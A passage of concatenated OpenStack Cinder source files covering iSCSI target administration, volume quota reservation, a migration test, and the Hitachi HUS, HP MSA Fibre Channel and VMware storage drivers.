"id:%(vol_id)s: %(e)s")
% {'vol_id': vol_id, 'e': e})
raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
return tid
def remove_iscsi_target(self, tid, lun, vol_id, vol_name, **kwargs):
LOG.info(_('Removing iscsi_target for volume: %s') % vol_id)
self._delete_logicalunit(tid, lun, **kwargs)
self._delete_target(tid, **kwargs)
vol_uuid_file = vol_name
conf_file = self.iet_conf
if os.path.exists(conf_file):
with self.temporary_chown(conf_file):
try:
iet_conf_text = open(conf_file, 'r+')
full_txt = iet_conf_text.readlines()
new_iet_conf_txt = []
count = 0
for line in full_txt:
if count > 0:
count -= 1
continue
elif re.search(vol_uuid_file, line):
count = 2
continue
else:
new_iet_conf_txt.append(line)
iet_conf_text.seek(0)
iet_conf_text.truncate(0)
iet_conf_text.writelines(new_iet_conf_txt)
finally:
iet_conf_text.close()
def _new_target(self, name, tid, **kwargs):
self._run('--op', 'new',
'--tid=%s' % tid,
'--params', 'Name=%s' % name,
**kwargs)
def _delete_target(self, tid, **kwargs):
self._run('--op', 'delete',
'--tid=%s' % tid,
**kwargs)
def show_target(self, tid, iqn=None, **kwargs):
self._run('--op', 'show',
'--tid=%s' % tid,
**kwargs)
def _new_logicalunit(self, tid, lun, path, **kwargs):
self._run('--op', 'new',
'--tid=%s' % tid,
'--lun=%d' % lun,
'--params', 'Path=%s,Type=%s' % (path, self._iotype(path)),
**kwargs)
def _delete_logicalunit(self, tid, lun, **kwargs):
self._run('--op', 'delete',
'--tid=%s' % tid,
'--lun=%d' % lun,
**kwargs)
def _new_auth(self, tid, type, username, password, **kwargs):
self._run('--op', 'new',
'--tid=%s' % tid,
'--user',
'--params=%s=%s,Password=%s' % (type, username, password),
**kwargs)
class FakeIscsiHelper(object):
def __init__(self):
self.tid = 1
self._execute = None
def set_execute(self, execute):
self._execute = execute
def create_iscsi_target(self, *args, **kwargs):
self.tid += 1
return self.tid
class LioAdm(TargetAdmin):
"""iSCSI target administration for LIO using python-rtslib."""
def __init__(self, root_helper, lio_initiator_iqns='',
iscsi_target_prefix='iqn.2010-10.org.openstack:',
execute=putils.execute):
super(LioAdm, self).__init__('cinder-rtstool', root_helper, execute)
self.iscsi_target_prefix = iscsi_target_prefix
self.lio_initiator_iqns = lio_initiator_iqns
self._verify_rtstool()
def _verify_rtstool(self):
try:
self._execute('cinder-rtstool', 'verify')
except (OSError, putils.ProcessExecutionError):
LOG.error(_('cinder-rtstool is not installed correctly'))
raise
def _get_target(self, iqn):
(out, err) = self._execute('cinder-rtstool',
'get-targets',
run_as_root=True)
lines = out.split('\n')
for line in lines:
if iqn in line:
return line
return None
def create_iscsi_target(self, name, tid, lun, path,
chap_auth=None, **kwargs):
# tid and lun are not used
vol_id = name.split(':')[1]
LOG.info(_('Creating iscsi_target for volume: %s') % vol_id)
# rtstool requires chap_auth, but unit tests don't provide it
chap_auth_userid = 'test_id'
chap_auth_password = '<PASSWORD>'
if chap_auth is not None:
(chap_auth_userid, chap_auth_password) = chap_auth.split(' ')[1:]
extra_args = []
if self.lio_initiator_iqns:
extra_args.append(self.lio_initiator_iqns)
try:
command_args = ['cinder-rtstool',
'create',
path,
name,
chap_auth_userid,
chap_auth_password]
if extra_args:
command_args.extend(extra_args)
self._execute(*command_args, run_as_root=True)
except putils.ProcessExecutionError as e:
LOG.error(_("Failed to create iscsi target for volume "
"id:%s.") % vol_id)
LOG.error("%s" % e)
raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
iqn = '%s%s' % (self.iscsi_target_prefix, vol_id)
tid = self._get_target(iqn)
if tid is None:
LOG.error(_("Failed to create iscsi target for volume "
"id:%s.") % vol_id)
raise exception.NotFound()
return tid
def remove_iscsi_target(self, tid, lun, vol_id, vol_name, **kwargs):
LOG.info(_('Removing iscsi_target: %s') % vol_id)
vol_uuid_name = vol_name
iqn = '%s%s' % (self.iscsi_target_prefix, vol_uuid_name)
try:
self._execute('cinder-rtstool',
'delete',
iqn,
run_as_root=True)
except putils.ProcessExecutionError as e:
LOG.error(_("Failed to remove iscsi target for volume "
"id:%s.") % vol_id)
LOG.error("%s" % e)
raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
def show_target(self, tid, iqn=None, **kwargs):
if iqn is None:
raise exception.InvalidParameterValue(
err=_('valid iqn needed for show_target'))
tid = self._get_target(iqn)
if tid is None:
raise exception.NotFound()
def initialize_connection(self, volume, connector):
volume_iqn = volume['provider_location'].split(' ')[1]
(auth_method, auth_user, auth_pass) = \
volume['provider_auth'].split(' ', 3)
# Add initiator iqns to target ACL
try:
self._execute('cinder-rtstool', 'add-initiator',
volume_iqn,
auth_user,
auth_pass,
connector['initiator'],
run_as_root=True)
except putils.ProcessExecutionError:
LOG.error(_("Failed to add initiator iqn %s to target") %
connector['initiator'])
raise exception.ISCSITargetAttachFailed(volume_id=volume['id'])
class ISERTgtAdm(TgtAdm):
VOLUME_CONF = """
<target %s>
driver iser
backing-store %s
</target>
"""
VOLUME_CONF_WITH_CHAP_AUTH = """
<target %s>
driver iser
backing-store %s
%s
</target>
"""
def __init__(self, root_helper, volumes_dir,
target_prefix='iqn.2010-10.org.iser.openstack:',
execute=putils.execute):
super(ISERTgtAdm, self).__init__(root_helper, volumes_dir,
target_prefix, execute)
|
adelina-t/cinder | cinder/quota_utils.py | <filename>cinder/quota_utils.py
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from cinder import exception
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
from cinder import quota
LOG = logging.getLogger(__name__)
QUOTAS = quota.QUOTAS
def get_volume_type_reservation(ctxt, volume, type_id):
# Reserve quotas for the given volume type
try:
reserve_opts = {'volumes': 1, 'gigabytes': volume['size']}
QUOTAS.add_volume_type_opts(ctxt,
reserve_opts,
type_id)
reservations = QUOTAS.reserve(ctxt, **reserve_opts)
except exception.OverQuota as e:
overs = e.kwargs['overs']
usages = e.kwargs['usages']
quotas = e.kwargs['quotas']
def _consumed(name):
return (usages[name]['reserved'] + usages[name]['in_use'])
for over in overs:
if 'gigabytes' in over:
s_size = volume['size']
d_quota = quotas[over]
d_consumed = _consumed(over)
msg = _("Quota exceeded for %(s_pid)s, tried to create "
"%(s_size)sG volume - (%(d_consumed)dG of "
"%(d_quota)dG already consumed)")
LOG.warn(msg % {'s_pid': ctxt.project_id,
's_size': s_size,
'd_consumed': d_consumed,
'd_quota': d_quota})
raise exception.VolumeSizeExceedsAvailableQuota(
requested=s_size, quota=d_quota, consumed=d_consumed)
elif 'volumes' in over:
msg = _("Quota exceeded for %(s_pid)s, tried to create "
"volume (%(d_consumed)d volumes "
"already consumed)")
LOG.warn(msg % {'s_pid': ctxt.project_id,
'd_consumed': _consumed(over)})
raise exception.VolumeLimitExceeded(
allowed=quotas[over])
return reservations
|
adelina-t/cinder | cinder/tests/test_misc.py |
# Copyright 2010 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import glob
import os
from cinder import exception
from cinder.openstack.common.gettextutils import _
from cinder import test
class ExceptionTestCase(test.TestCase):
@staticmethod
def _raise_exc(exc):
raise exc()
def test_exceptions_raise(self):
# NOTE(dprince): disable format errors since we are not passing kwargs
self.flags(fatal_exception_format_errors=False)
for name in dir(exception):
exc = getattr(exception, name)
if isinstance(exc, type):
self.assertRaises(exc, self._raise_exc, exc)
class ProjectTestCase(test.TestCase):
def test_all_migrations_have_downgrade(self):
topdir = os.path.normpath(os.path.dirname(__file__) + '/../../')
py_glob = os.path.join(topdir, "cinder", "db", "sqlalchemy",
"migrate_repo", "versions", "*.py")
missing_downgrade = []
for path in glob.iglob(py_glob):
has_upgrade = False
has_downgrade = False
with open(path, "r") as f:
for line in f:
if 'def upgrade(' in line:
has_upgrade = True
if 'def downgrade(' in line:
has_downgrade = True
if has_upgrade and not has_downgrade:
fname = os.path.basename(path)
missing_downgrade.append(fname)
helpful_msg = (_("The following migrations are missing a downgrade:"
"\n\t%s") % '\n\t'.join(sorted(missing_downgrade)))
self.assertFalse(missing_downgrade, msg=helpful_msg)
|
adelina-t/cinder | cinder/volume/drivers/hds/hds.py | # Copyright (c) 2013 Hitachi Data Systems, Inc.
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
iSCSI Cinder Volume driver for Hitachi Unified Storage (HUS) platform.
"""
from oslo.config import cfg
from xml.etree import ElementTree as ETree
from cinder import exception
from cinder.openstack.common import excutils
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
from cinder import utils
from cinder.volume import driver
from cinder.volume.drivers.hds.hus_backend import HusBackend
HDS_VERSION = '1.0.2'
LOG = logging.getLogger(__name__)
HUS_OPTS = [
cfg.StrOpt('hds_cinder_config_file',
default='/opt/hds/hus/cinder_hus_conf.xml',
help='The configuration file for the Cinder HDS driver '
'for HUS'), ]
CONF = cfg.CONF
CONF.register_opts(HUS_OPTS)
HI_IQN = 'iqn.1994-04.jp.co.hitachi:' # fixed string, for now.
HUS_DEFAULT_CONFIG = {'hus_cmd': 'hus-cmd',
'lun_start': '0',
'lun_end': '8192'}
def factory_bend():
"""Factory over-ride in self-tests."""
return HusBackend()
def _loc_info(loc):
"""Parse info from location string."""
info = {}
tup = loc.split(',')
if len(tup) < 5:
info['id_lu'] = tup[0].split('.')
return info
info['id_lu'] = tup[2].split('.')
info['tgt'] = tup
return info
def _do_lu_range_check(start, end, maxlun):
"""Validate array allocation range."""
LOG.debug("Range: start LU: %(start)s, end LU: %(end)s"
% {'start': start,
'end': end})
if int(start) < 0:
msg = 'start LU limit too low: ' + start
raise exception.InvalidInput(reason=msg)
if int(start) >= int(maxlun):
msg = 'start LU limit high: ' + start + ' max: ' + maxlun
raise exception.InvalidInput(reason=msg)
if int(end) <= int(start):
msg = 'LU end limit too low: ' + end
raise exception.InvalidInput(reason=msg)
if int(end) > int(maxlun):
end = maxlun
LOG.debug("setting LU upper (end) limit to %s" % maxlun)
return (start, end)
def _xml_read(root, element, check=None):
"""Read an xml element."""
try:
val = root.findtext(element)
LOG.info(_("%(element)s: %(val)s")
% {'element': element,
'val': val})
if val:
return val.strip()
if check:
raise exception.ParameterNotFound(param=element)
return None
except ETree.ParseError:
if check:
with excutils.save_and_reraise_exception():
LOG.error(_("XML exception reading parameter: %s") % element)
else:
LOG.info(_("XML exception reading parameter: %s") % element)
return None
def _read_config(xml_config_file):
"""Read hds driver specific xml config file."""
try:
root = ETree.parse(xml_config_file).getroot()
except Exception:
raise exception.NotFound(message='config file not found: '
+ xml_config_file)
config = {}
arg_prereqs = ['mgmt_ip0', 'mgmt_ip1', 'username', 'password']
for req in arg_prereqs:
config[req] = _xml_read(root, req, 'check')
config['hdp'] = {}
config['services'] = {}
for svc in ['svc_0', 'svc_1', 'svc_2', 'svc_3']: # min one needed
if _xml_read(root, svc) is None:
continue
service = {}
service['label'] = svc
for arg in ['volume_type', 'hdp', 'iscsi_ip']: # none optional
service[arg] = _xml_read(root, svc + '/' + arg, 'check')
config['services'][service['volume_type']] = service
config['hdp'][service['hdp']] = service['hdp']
if config['services'].keys() is None: # at least one service required!
raise exception.ParameterNotFound(param="No service found")
config['snapshot_hdp'] = _xml_read(root, 'snapshot/hdp', 'check')
for arg in ['hus_cmd', 'lun_start', 'lun_end']: # optional
config[arg] = _xml_read(root, arg) or HUS_DEFAULT_CONFIG[arg]
return config
class HUSDriver(driver.ISCSIDriver):
"""HDS HUS volume driver."""
VERSION = HDS_VERSION
def _array_info_get(self):
"""Get array parameters."""
out = self.bend.get_version(self.config['hus_cmd'],
HDS_VERSION,
self.config['mgmt_ip0'],
self.config['mgmt_ip1'],
self.config['username'],
self.config['password'])
inf = out.split()
return(inf[1], 'hus_' + inf[1], inf[6])
def _get_iscsi_info(self):
"""Validate array iscsi parameters."""
out = self.bend.get_iscsi_info(self.config['hus_cmd'],
HDS_VERSION,
self.config['mgmt_ip0'],
self.config['mgmt_ip1'],
self.config['username'],
self.config['password'])
lines = out.split('\n')
conf = {} # dict based on iSCSI portal ip addresses
for line in lines:
if 'CTL' in line:
inf = line.split()
(ctl, port, ip, ipp) = (inf[1], inf[3], inf[5], inf[7])
conf[ip] = {}
conf[ip]['ctl'] = ctl
conf[ip]['port'] = port
conf[ip]['iscsi_port'] = ipp # HUS default: 3260
msg = _('portal: %(ip)s:%(ipp)s, CTL: %(ctl)s, port: %(port)s')
LOG.debug(msg
% {'ip': ip,
'ipp': ipp,
'ctl': ctl,
'port': port})
return conf
def _get_service(self, volume):
"""Get the available service parameters for a given volume type."""
label = None
if volume['volume_type']:
label = volume['volume_type']['name']
label = label or 'default'
if label in self.config['services'].keys():
svc = self.config['services'][label]
service = (svc['iscsi_ip'], svc['iscsi_port'], svc['ctl'],
svc['port'], svc['hdp']) # ip, ipp, ctl, port, hdp
else:
LOG.error(_("No configuration found for service: %s") % label)
raise exception.ParameterNotFound(param=label)
return service
def _get_stats(self):
"""Get HDP stats from HUS."""
total_cap = 0
total_used = 0
out = self.bend.get_hdp_info(self.config['hus_cmd'],
HDS_VERSION,
self.config['mgmt_ip0'],
self.config['mgmt_ip1'],
self.config['username'],
self.config['password'])
for line in out.split('\n'):
if 'HDP' in line:
(hdp, size, _ign, used) = line.split()[1:5] # in MB
if hdp in self.config['hdp'].keys():
total_cap += int(size)
total_used += int(used)
hus_stat = {}
hus_stat['total_capacity_gb'] = int(total_cap / 1024) # in GB
hus_stat['free_capacity_gb'] = int((total_cap - total_used) / 1024)
be_name = self.configuration.safe_get('volume_backend_name')
hus_stat["volume_backend_name"] = be_name or 'HUSDriver'
hus_stat["vendor_name"] = 'HDS'
hus_stat["driver_version"] = HDS_VERSION
hus_stat["storage_protocol"] = 'iSCSI'
hus_stat['QoS_support'] = False
hus_stat['reserved_percentage'] = 0
return hus_stat
def _get_hdp_list(self):
"""Get HDPs from HUS."""
out = self.bend.get_hdp_info(self.config['hus_cmd'],
HDS_VERSION,
self.config['mgmt_ip0'],
self.config['mgmt_ip1'],
self.config['username'],
self.config['password'])
hdp_list = []
for line in out.split('\n'):
if 'HDP' in line:
hdp_list.extend(line.split()[1:2])
return hdp_list
def _check_hdp_list(self):
"""Verify all HDPs specified in the configuration exist."""
hdpl = self._get_hdp_list()
lst = self.config['hdp'].keys()
lst.extend([self.config['snapshot_hdp'], ])
for hdp in lst:
if hdp not in hdpl:
LOG.error(_("HDP not found: %s") % hdp)
err = "HDP not found: " + hdp
raise exception.ParameterNotFound(param=err)
def _id_to_vol(self, idd):
"""Given the volume id, retrieve the volume object from database."""
vol = self.db.volume_get(self.context, idd)
return vol
def _update_vol_location(self, id, loc):
"""Update the provider location."""
update = {}
update['provider_location'] = loc
self.db.volume_update(self.context, id, update)
def __init__(self, *args, **kwargs):
"""Initialize, read different config parameters."""
super(HUSDriver, self).__init__(*args, **kwargs)
self.driver_stats = {}
self.context = {}
self.bend = factory_bend()
self.configuration.append_config_values(HUS_OPTS)
self.config = _read_config(self.configuration.hds_cinder_config_file)
(self.arid, self.hus_name, self.lumax) = self._array_info_get()
self._check_hdp_list()
start = self.config['lun_start']
end = self.config['lun_end']
maxlun = self.lumax
(self.start, self.end) = _do_lu_range_check(start, end, maxlun)
iscsi_info = self._get_iscsi_info()
for svc in self.config['services'].keys():
svc_ip = self.config['services'][svc]['iscsi_ip']
if svc_ip in iscsi_info.keys():
self.config['services'][svc]['port'] = (
iscsi_info[svc_ip]['port'])
self.config['services'][svc]['ctl'] = iscsi_info[svc_ip]['ctl']
self.config['services'][svc]['iscsi_port'] = (
iscsi_info[svc_ip]['iscsi_port'])
else: # config iscsi address not found on device!
LOG.error(_("iSCSI portal not found for service: %s") % svc_ip)
raise exception.ParameterNotFound(param=svc_ip)
return
def check_for_setup_error(self):
"""Returns an error if prerequisites aren't met."""
return
def do_setup(self, context):
"""do_setup.
Setup and verify HDS HUS storage connection. But moved it to
__init__ as (setup/errors) could became an infinite loop.
"""
self.context = context
def ensure_export(self, context, volume):
return
def create_export(self, context, volume):
"""Create an export. Moved to initialize_connection."""
return
@utils.synchronized('hds_hus', external=True)
def create_volume(self, volume):
"""Create a LU on HUS."""
service = self._get_service(volume)
(_ip, _ipp, _ctl, _port, hdp) = service
out = self.bend.create_lu(self.config['hus_cmd'],
HDS_VERSION,
self.config['mgmt_ip0'],
self.config['mgmt_ip1'],
self.config['username'],
self.config['password'],
self.arid, hdp, self.start, self.end,
'%s' % (int(volume['size']) * 1024))
lun = self.arid + '.' + out.split()[1]
sz = int(out.split()[5])
LOG.debug("LUN %(lun)s of size %(sz)s MB is created."
% {'lun': lun,
'sz': sz})
return {'provider_location': lun}
@utils.synchronized('hds_hus', external=True)
def create_cloned_volume(self, dst, src):
"""Create a clone of a volume."""
if src['size'] != dst['size']:
msg = 'clone volume size mismatch'
raise exception.VolumeBackendAPIException(data=msg)
service = self._get_service(dst)
(_ip, _ipp, _ctl, _port, hdp) = service
size = int(src['size']) * 1024
source_vol = self._id_to_vol(src['id'])
(arid, slun) = _loc_info(source_vol['provider_location'])['id_lu']
out = self.bend.create_dup(self.config['hus_cmd'],
HDS_VERSION,
self.config['mgmt_ip0'],
self.config['mgmt_ip1'],
self.config['username'],
self.config['password'],
arid, slun,
hdp,
self.start, self.end,
'%s' % (size))
lun = self.arid + '.' + out.split()[1]
size = int(out.split()[5])
LOG.debug("LUN %(lun)s of size %(size)s MB is cloned."
% {'lun': lun,
'size': size})
return {'provider_location': lun}
@utils.synchronized('hds_hus', external=True)
def extend_volume(self, volume, new_size):
"""Extend an existing volume."""
(arid, lun) = _loc_info(volume['provider_location'])['id_lu']
self.bend.extend_vol(self.config['hus_cmd'],
HDS_VERSION,
self.config['mgmt_ip0'],
self.config['mgmt_ip1'],
self.config['username'],
self.config['password'],
arid, lun,
'%s' % (new_size * 1024))
LOG.debug("LUN %(lun)s extended to %(size)s GB."
% {'lun': lun,
'size': new_size})
@utils.synchronized('hds_hus', external=True)
def delete_volume(self, volume):
"""Delete an LU on HUS."""
prov_loc = volume['provider_location']
if prov_loc is None:
return
info = _loc_info(prov_loc)
(arid, lun) = info['id_lu']
if 'tgt' in info.keys(): # connected?
(_portal, iqn, loc, ctl, port) = info['tgt']
self.bend.del_iscsi_conn(self.config['hus_cmd'],
HDS_VERSION,
self.config['mgmt_ip0'],
self.config['mgmt_ip1'],
self.config['username'],
self.config['password'],
arid, lun, ctl, port, iqn,
'')
name = self.hus_name
LOG.debug("delete lun %(lun)s on %(name)s"
% {'lun': lun,
'name': name})
self.bend.delete_lu(self.config['hus_cmd'],
HDS_VERSION,
self.config['mgmt_ip0'],
self.config['mgmt_ip1'],
self.config['username'],
self.config['password'],
arid, lun)
def remove_export(self, context, volume):
"""Disconnect a volume from an attached instance."""
return
@utils.synchronized('hds_hus', external=True)
def initialize_connection(self, volume, connector):
"""Map the created volume to connector['initiator']."""
service = self._get_service(volume)
(ip, ipp, ctl, port, _hdp) = service
info = _loc_info(volume['provider_location'])
if 'tgt' in info.keys(): # spurious repeat connection
return
(arid, lun) = info['id_lu']
loc = arid + '.' + lun
iqn = HI_IQN + connector['host']
out = self.bend.add_iscsi_conn(self.config['hus_cmd'],
HDS_VERSION,
self.config['mgmt_ip0'],
self.config['mgmt_ip1'],
self.config['username'],
self.config['password'],
arid, lun, ctl, port, iqn,
connector['initiator'])
hus_portal = ip + ':' + ipp
tgt = hus_portal + ',' + iqn + ',' + loc + ',' + ctl + ',' + port
properties = {}
hlun = out.split()[1]
properties['provider_location'] = tgt
self._update_vol_location(volume['id'], tgt)
properties['target_discovered'] = False
properties['target_portal'] = hus_portal
properties['target_iqn'] = iqn
properties['target_lun'] = hlun
properties['volume_id'] = volume['id']
return {'driver_volume_type': 'iscsi', 'data': properties}
@utils.synchronized('hds_hus', external=True)
def terminate_connection(self, volume, connector, **kwargs):
"""Terminate a connection to a volume."""
info = _loc_info(volume['provider_location'])
if 'tgt' not in info.keys(): # spurious disconnection
return
(arid, lun) = info['id_lu']
(_portal, iqn, loc, ctl, port) = info['tgt']
self.bend.del_iscsi_conn(self.config['hus_cmd'],
HDS_VERSION,
self.config['mgmt_ip0'],
self.config['mgmt_ip1'],
self.config['username'],
self.config['password'],
arid, lun, ctl, port, iqn,
connector['initiator'])
self._update_vol_location(volume['id'], loc)
return {'provider_location': loc}
@utils.synchronized('hds_hus', external=True)
def create_volume_from_snapshot(self, volume, snapshot):
"""Create a volume from a snapshot."""
size = int(snapshot['volume_size']) * 1024
(arid, slun) = _loc_info(snapshot['provider_location'])['id_lu']
service = self._get_service(volume)
(_ip, _ipp, _ctl, _port, hdp) = service
out = self.bend.create_dup(self.config['hus_cmd'],
HDS_VERSION,
self.config['mgmt_ip0'],
self.config['mgmt_ip1'],
self.config['username'],
self.config['password'],
arid, slun, hdp,
self.start, self.end,
'%s' % (size))
lun = self.arid + '.' + out.split()[1]
sz = int(out.split()[5])
LOG.debug("LUN %(lun)s of size %(sz)s MB is created from snapshot."
% {'lun': lun,
'sz': sz})
return {'provider_location': lun}
@utils.synchronized('hds_hus', external=True)
def create_snapshot(self, snapshot):
"""Create a snapshot."""
source_vol = self._id_to_vol(snapshot['volume_id'])
size = int(snapshot['volume_size']) * 1024
(arid, slun) = _loc_info(source_vol['provider_location'])['id_lu']
out = self.bend.create_dup(self.config['hus_cmd'],
HDS_VERSION,
self.config['mgmt_ip0'],
self.config['mgmt_ip1'],
self.config['username'],
self.config['password'],
arid, slun,
self.config['snapshot_hdp'],
self.start, self.end,
'%s' % (size))
lun = self.arid + '.' + out.split()[1]
size = int(out.split()[5])
LOG.debug("LUN %(lun)s of size %(size)s MB is created as snapshot."
% {'lun': lun,
'size': size})
return {'provider_location': lun}
@utils.synchronized('hds_hus', external=True)
def delete_snapshot(self, snapshot):
"""Delete a snapshot."""
loc = snapshot['provider_location']
if loc is None: # to take care of spurious input
return # which could cause exception.
(arid, lun) = loc.split('.')
self.bend.delete_lu(self.config['hus_cmd'],
HDS_VERSION,
self.config['mgmt_ip0'],
self.config['mgmt_ip1'],
self.config['username'],
self.config['password'],
arid, lun)
LOG.debug("LUN %s is deleted." % lun)
return
@utils.synchronized('hds_hus', external=True)
def get_volume_stats(self, refresh=False):
"""Get volume stats. If 'refresh', run update the stats first."""
if refresh:
self.driver_stats = self._get_stats()
return self.driver_stats
|
adelina-t/cinder | cinder/volume/drivers/san/hp/hp_msa_fc.py | # Copyright 2014 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from cinder.openstack.common import log as logging
from cinder import utils
import cinder.volume.driver
from cinder.volume.drivers.san.hp import hp_msa_common as hpcommon
from cinder.volume.drivers.san import san
from cinder.zonemanager import utils as fczm_utils
LOG = logging.getLogger(__name__)
class HPMSAFCDriver(cinder.volume.driver.FibreChannelDriver):
VERSION = "0.1"
def __init__(self, *args, **kwargs):
super(HPMSAFCDriver, self).__init__(*args, **kwargs)
self.common = None
self.configuration.append_config_values(hpcommon.hpmsa_opt)
self.configuration.append_config_values(san.san_opts)
def _init_common(self):
return hpcommon.HPMSACommon(self.configuration)
def _check_flags(self):
required_flags = ['san_ip', 'san_login', 'san_password']
self.common.check_flags(self.configuration, required_flags)
def do_setup(self, context):
self.common = self._init_common()
self._check_flags()
self.common.do_setup(context)
def check_for_setup_error(self):
self._check_flags()
@utils.synchronized('msa', external=True)
def create_volume(self, volume):
self.common.client_login()
try:
metadata = self.common.create_volume(volume)
return {'metadata': metadata}
finally:
self.common.client_logout()
@utils.synchronized('msa', external=True)
def create_volume_from_snapshot(self, volume, src_vref):
self.common.client_login()
try:
self.common.create_volume_from_snapshot(volume, src_vref)
finally:
self.common.client_logout()
@utils.synchronized('msa', external=True)
def create_cloned_volume(self, volume, src_vref):
self.common.client_login()
try:
new_vol = self.common.create_cloned_volume(volume, src_vref)
return {'metadata': new_vol}
finally:
self.common.client_logout()
@utils.synchronized('msa', external=True)
def delete_volume(self, volume):
self.common.client_login()
try:
self.common.delete_volume(volume)
finally:
self.common.client_logout()
@fczm_utils.AddFCZone
@utils.synchronized('msa', external=True)
def initialize_connection(self, volume, connector):
self.common.client_login()
try:
data = {}
data['target_lun'] = self.common.map_volume(volume, connector)
ports = self.common.get_active_fc_target_ports()
data['target_discovered'] = True
data['target_wwn'] = ports
info = {'driver_volume_type': 'fibre_channel',
'data': data}
return info
finally:
self.common.client_logout()
@fczm_utils.RemoveFCZone
@utils.synchronized('msa', external=True)
def terminate_connection(self, volume, connector, **kwargs):
self.common.client_login()
try:
self.common.unmap_volume(volume, connector)
finally:
self.common.client_logout()
@utils.synchronized('msa', external=True)
def get_volume_stats(self, refresh=False):
if refresh:
self.common.client_login()
try:
stats = self.common.get_volume_stats(refresh)
stats['storage_protocol'] = 'FC'
stats['driver_version'] = self.VERSION
backend_name = self.configuration.safe_get('volume_backend_name')
stats['volume_backend_name'] = (backend_name or
self.__class__.__name__)
return stats
finally:
if refresh:
self.common.client_logout()
@utils.synchronized('msa', external=True)
def create_export(self, context, volume):
pass
@utils.synchronized('msa', external=True)
def ensure_export(self, context, volume):
pass
@utils.synchronized('msa', external=True)
def remove_export(self, context, volume):
pass
@utils.synchronized('msa', external=True)
def create_snapshot(self, snapshot):
self.common.client_login()
try:
self.common.create_snapshot(snapshot)
finally:
self.common.client_logout()
@utils.synchronized('msa', external=True)
def delete_snapshot(self, snapshot):
self.common.client_login()
try:
self.common.delete_snapshot(snapshot)
finally:
self.common.client_logout()
@utils.synchronized('msa', external=True)
def extend_volume(self, volume, new_size):
self.common.client_login()
try:
self.common.extend_volume(volume, new_size)
finally:
self.common.client_logout()
|
adelina-t/cinder | cinder/volume/drivers/vmware/vim.py | <reponame>adelina-t/cinder
# Copyright (c) 2013 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Classes for making VMware VI SOAP calls.
"""
import httplib
import urllib2
import suds
from cinder.openstack.common.gettextutils import _
from cinder.volume.drivers.vmware import error_util
from cinder.volume.drivers.vmware import vim_util
RESP_NOT_XML_ERROR = "Response is 'text/html', not 'text/xml'"
CONN_ABORT_ERROR = 'Software caused connection abort'
ADDRESS_IN_USE_ERROR = 'Address already in use'
def get_moref(value, type):
"""Get managed object reference.
:param value: value for the managed object
:param type: type of the managed object
:return: Managed object reference with input value and type
"""
moref = suds.sudsobject.Property(value)
moref._type = type
return moref
class VIMMessagePlugin(suds.plugin.MessagePlugin):
def addAttributeForValue(self, node):
"""Helper to handle AnyType.
suds does not handle AnyType properly.
VI SDK requires type attribute to be set when AnyType is used
:param node: XML value node
"""
if node.name == 'value':
node.set('xsi:type', 'xsd:string')
def marshalled(self, context):
"""Marshal soap context.
Provides the plugin with the opportunity to prune empty
nodes and fixup nodes before sending it to the server.
:param context: SOAP context
"""
# suds builds the entire request object based on the wsdl schema.
# VI SDK throws server errors if optional SOAP nodes are sent
# without values, e.g. <test/> as opposed to <test>test</test>
context.envelope.prune()
context.envelope.walk(self.addAttributeForValue)
class Vim(object):
"""The VIM Object."""
def __init__(self, protocol='https', host='localhost', wsdl_loc=None):
"""Create communication interfaces for initiating SOAP transactions.
:param protocol: http or https
:param host: Server IPAddress[:port] or Hostname[:port]
"""
self._protocol = protocol
self._host_name = host
if not wsdl_loc:
wsdl_loc = Vim._get_wsdl_loc(protocol, host)
soap_url = vim_util.get_soap_url(protocol, host)
self._client = suds.client.Client(wsdl_loc, location=soap_url,
plugins=[VIMMessagePlugin()])
self._service_content = self.RetrieveServiceContent('ServiceInstance')
@staticmethod
def _get_wsdl_loc(protocol, host_name):
"""Return default WSDL file location hosted at the server.
:param protocol: http or https
:param host_name: ESX/VC server host name
:return: Default WSDL file location hosted at the server
"""
return vim_util.get_soap_url(protocol, host_name) + '/vimService.wsdl'
@property
def service_content(self):
return self._service_content
@property
def client(self):
return self._client
def __getattr__(self, attr_name):
"""Makes the API call and gets the result."""
def retrieve_properties_ex_fault_checker(response):
"""Checks the RetrievePropertiesEx response for errors.
Certain faults are sent as part of the SOAP body as property of
